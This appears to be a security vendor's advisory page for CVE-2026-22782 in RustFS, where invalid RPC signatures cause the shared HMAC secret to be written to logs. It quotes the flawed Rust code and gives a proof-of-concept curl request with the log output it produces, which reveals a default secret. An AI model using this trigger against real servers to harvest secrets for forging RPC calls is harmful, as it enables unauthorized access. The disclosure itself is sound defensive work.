🛡️ CVE-2026-22782 — rustfs

🟢 CVSS 2.0 — Low ⚠️ Exploit Public CWE-532 OSV
2.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

RustFS's RPC signature verification logs shared secret

Summary

Invalid RPC signatures cause the server to log the shared HMAC secret (and expected signature), which exposes the secret to log readers and enables forged RPC calls.

Details

In [crates/ecstore/src/rpc/http_auth.rs:115-122](https://github.com/rustfs/rustfs/blob/9e162b6e9ebb874cc1d06a7b33bc4a05786578aa/crates/ecstore/src/rpc/http_auth.rs#L115-L122) , the invalid signature branch logs sensitive data:

```rs

if signature != expected_signature {

error!(

"verify_rpc_signature: Invalid signature: secret {}, url {}, method {}, timestamp {}, signature {}, expected_signature {}",

secret, url, method, timestamp, signature, expected_signature

);

return Err(std::io::Error::other("Invalid signature"));

}

```

This log line includes secret and expected_signature, both derived from the shared HMAC key. Any invalidly signed request triggers this path. The function is reachable from RPC and admin request handlers.

PoC

1. Run RustFS with error logging enabled.

1. Send a request with an invalid signature:

```

ts=$(date +%s)

curl -v \

-H "x-rustfs-timestamp: $ts" \

-H "x-rustfs-signature: invalid-signature" \

"http://localhost:9000/rustfs/rpc/read_file_stream?disk=foo&volume=bar&path=baz&offset=0&length=1"

```

1. Observed output:

```

HTTP 403 AccessDenied: Invalid signature

verify_rpc_signature: Invalid signature: secret rustfsadmin, url /rustfs/rpc/read_file_stream?disk=foo&volume=bar&path=baz&offset=0&length=1, method GET, timestamp 1767852115, signature invalid-signature, expected_signature oisNxNRTb80GXf97s/PGdScJzu8QB9Oxs+uOwf8RiK8=

```

Impact

  • Exposes the shared RPC HMAC secret to log readers.
  • Enables attackers with log access to forge valid RPC signatures and make unauthorized RPC calls.

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. Rated impact: confidentiality low, integrity none, availability none.

Weakness class

CVE-2026-22782 is classified as CWE-532: Insertion of Sensitive Information into Log File. Sensitive values are written to logs, which are typically kept longer and read more widely than the data warrants.

Affected software

CVE-2026-22782 is recorded against 1 package.

  • rustfs

Timeline and source

Published on 16 January 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
github.com (Web)

Details

Severity LOW
CVSS Score 2.0
CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
CWE CWE-532
Public Exploit ⚠️ Yes
Source OSV
Published 2026-01-16
Updated 2026-08-12
Modified 2026-06-17

Affected Packages

Software From version Fixed in
rustfs

Similar Threats

Exploit Protection

Are you running rustfs?

CVE-2026-22782 carries CVSS 2.0 Low rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-22782 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.